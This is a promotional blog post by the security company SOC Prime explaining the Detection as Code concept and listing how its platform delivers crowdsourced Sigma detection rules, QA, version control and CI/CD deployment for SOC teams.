As you might’ve already guessed, Detection as Code (DaC) concept is fundamental for our SOC Prime Platform. And well, what other topic could we choose for our very first Medium story? You might think we’ll tell you another Detection-as-Code fairytale but not quite.
According to Anton Chuvakin, DaC did to security what DevOps did to IT. And indeed, Detection as Code isn’t just a set of technologies and procedures but also a promising new cultural model worth reviewing from all angles to understand its real value. However, first, let’s forget sugar-coating and start with what raises concerns.
A reality-check from your security analyst may sound something like this:
- All software has vulnerabilities
- No organization can ever be 100% secure
- No detection item is 100% accurate
How are you supposed to live with this information now? Let’s figure it out.
Of course, implementing the necessary design practices, processes, and policies is a viable solution to deal with an ever-growing threat landscape. But as soon as you start, you get so busy that you find no time and place for “culture” discussions. All these things require a great deal of budget, talent, intelligence, and ability to use them right…
Sure, detection eventually IS a code, yet when it comes to building an actual CI/CD pipeline, you will inevitably have to handle continuous research, development, QA, version control, deployment, and innovation of every detection item for the whole infrastructure in small iterations 24/7/365. At this point, it becomes evident that Detection As Code is easier said than done. So, is DaC just another futuristic philosophy impossible to implement, and all that’s left is to surrender to the wisdom of insecurity?
At SOC Prime, we think insecurity and obsoleteness of siloed infrastructures aren’t a doom but a window of opportunity. That’s why we created our platform, gathering a global community of selected security researchers that help to make the impossible possible.
Then, you might ask, OK, collaborative cyber defense is good, but I might just go to GitHub to get free stuff. How are you different? Now let’s dive deeper.
Why We Need Detection-as-Code?
Let’s say you are a US-based company that has to comply with the U.S. federal government’s Risk Management Framework (RMF). At the same time, you’ve got to protect your organization from possible DDoS, information leakage, cyber-espionage, hijacked access, and other scary things that adversaries love so much.
What’s even worse? You know for sure that at any given moment, there might be some zero-day vulnerabilities in the software that runs the whole business. Waiting for an official patch means deliberately exposing your organization to high risk. Plus, deploying and installing patches on critical servers is time-consuming and risky because of the possible interruptions that could affect your performance stability.
That’s when CI/CD pipeline, specifically in the detection realm, starts looking more like a necessity rather than a philosophy. For sure, it’s better to deploy detections rapidly in a safe and reliable manner. However, internal SOC teams often face too much pressure to keep up.
The current Common Vulnerabilities and Exposures (CVE) list at the time of writing includes 175,296 entries. Imagine continuously supplying and renewing detections for new exploits of every one of these, plus taking care of a potentially unlimited number of zero-days. Let’s be realistic — even the most brilliant cybersecurity team is physically incapable of doing this.
SOC Prime’s Approach to Detection-as-Code
Now let’s see how SOC Prime addresses the pains and needs of SOC teams using the Detection-as-Code platform.
- Collaborative cyber defense approach: We launched Threat Bounty — a crowdsourcing initiative that, working together with our internal team of prominent detection engineers, creates the world’s largest and freshest pool of detections.
- Test-Driven Development (TDD) of detection content and continuous QA: Only one-third of detection items submitted by dedicated developers get published on our platform. We supply only the highest-quality rules.
- Version control: Our platform’s GUI comes with a ton of functions that simplify tracking and adjusting the detection performance in real-time.
- Cross-vendor and cross-tool detection content: All detections come in generic Sigma format while seamlessly integrating with over 25 security platforms.
- Metrics and improvement: It’s easy to assess automated visualized reports on all aspects of the current detection processes.
- CI/CD detection pipeline: We provide a ready-made CI/CD workflow for detections. All you have to do is log into your SOC Prime account and get your hands on what’s cooking on the platform right now.
- Proactive cyber defense: At SOC Prime’s Detection as Code platform, SOC teams can get the best of both worlds: leverage accurate alerts and go hunting with queries that leave more space for imagination and adjustments.
- Automation: Our Continuous Content Management (CCM) module allows security teams to streamline the up-to-date detection content deployment by customizing and automating this process.
- Analytics: Every detection item on our platform comes with a relevant threat context. Intelligence data and MITRE ATT&CK mapping are available without an expiration date.
- Code reusability: the detection code can be reused and updated for multiple use cases with necessary adjustments.
Old sharks in cyber may argue that Detection as Code is nothing new. At the same time, now, this concept has become fuller and more complex than it has ever been before. Partly it’s because attackers never stop trying to find their ways around the existing detection capabilities. Also, it might be inevitable for detection processes to grow into something bigger since IT infrastructures have become a vital part of businesses in virtually every economic area. It’s up to you whether to treat DaC as a real thing or not. All we can say is you never know unless you try.
